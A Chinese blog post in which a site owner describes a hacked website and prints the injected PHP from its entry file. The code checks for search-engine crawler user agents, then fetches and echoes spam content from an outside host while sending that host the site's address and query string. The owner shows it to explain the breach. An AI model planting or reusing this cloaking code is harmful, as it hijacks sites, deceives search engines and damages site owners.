最近收到阿里云发送的信息,提示我们的网站有不良的色情信息,对应的网站已经被停止访问。
被禁止的网址是:http://www.yyclub.me/?aav1v3,其实,任何http://www.yyclub.me/?xx的网址都将打开的是首页,打开首页查看,发现正常的啊,什么也没有。这就奇葩了,好像一个小偷来你家玩了一阵,然后自己走了,什么东西也没拿,什么东西也没留。然后打开监控发现确实有那么一段经历。
现在的网站是这样的:
但是通过百度的快照,确实看到了相关的信息。
这如何是好呢?只能让百度解决快照了。但是问题如何破?而且收录的情况在不断的增多。
代码被黑
通过查找,在入口文件中发现了一段代码,大体情况是,在搜索引擎爬取时,输入色情信息被记录,而如果是通过浏览器访问,则一切正常,正因此,很好的骗过了技术员的常规检查。
1 2 3 4 5 6 7 8 9 10
| header('Content-Type:text/html;charset=utf-8'); $key= $_SERVER["HTTP_USER_AGENT"]; if(strpos($key,strtolower('HaosouSpider'))!== false||strpos($key,strtolower('baidu'))!== false||strpos($key,strtolower('Yisou'))!== false||strpos($key,strtolower('Sogou'))!== false||strpos($key,strtolower('YisouSpider'))!== false||strpos($key,strtolower('360Spider'))!== false||strpos($key,strtolower('Baiduspide'))!== false||strpos($key,strtolower('Soso'))!== false ){ date_default_timezone_set('PRC'); $TD_server = "http://www.299wy.com/"; $host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']; $url = $TD_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']; $Content_mb=file_get_contents($url); echo $Content_mb; }
|